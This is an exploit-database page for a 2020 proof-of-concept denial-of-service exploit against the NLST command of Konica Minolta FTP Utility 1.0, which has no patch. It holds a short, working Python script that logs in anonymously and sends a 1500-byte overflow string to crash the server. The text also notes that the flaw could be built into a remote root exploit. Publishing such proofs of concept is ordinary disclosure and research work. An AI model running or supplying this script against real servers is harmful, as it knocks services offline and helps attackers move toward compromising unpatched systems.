header-logo
Suggest Exploit
vendor:
Konica Minolta FTP Utility
by:
Alvaro J. Gene (Socket_0x03)
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Konica Minolta FTP Utility
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 SP1
2020

Konica Minolta FTP Utility 1.0 – ‘NLST’ Denial of Service (PoC)

There is a buffer overflow vulnerability in the NLST command of the FTP server Konica Minolta FTP Utility that will allow an attacker to overwrite some registers, such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite some registers, an individual can use the vulnerable command to build a remote buffer overflow exploit that will root a system without any user interaction.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC) 
# Date: 2020-05-16
# Found by: Alvaro J. Gene (Socket_0x03)
# Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
# Vulnerable Application: Konica Minolta FTP Utility
# Version: 1.0
# Server: FTP Server
# Vulnerable Command: NLST
# Tested on: Windows 7 SP1

# Impact: There is a buffer overflow vulnerability in the NLST command of the FTP server
# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
# some registers, an individual can use the vulnerable command to build a remote buffer 
# overflow exploit that will root a system without any user interaction. 

====================================================================================================
=============== [ Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) ] ===============
====================================================================================================


from ftplib import FTP

ftp = FTP('192.168.0.16')

buffer = "A" * 1500

ftp.login()

ftp.retrlines('NLST ' + buffer)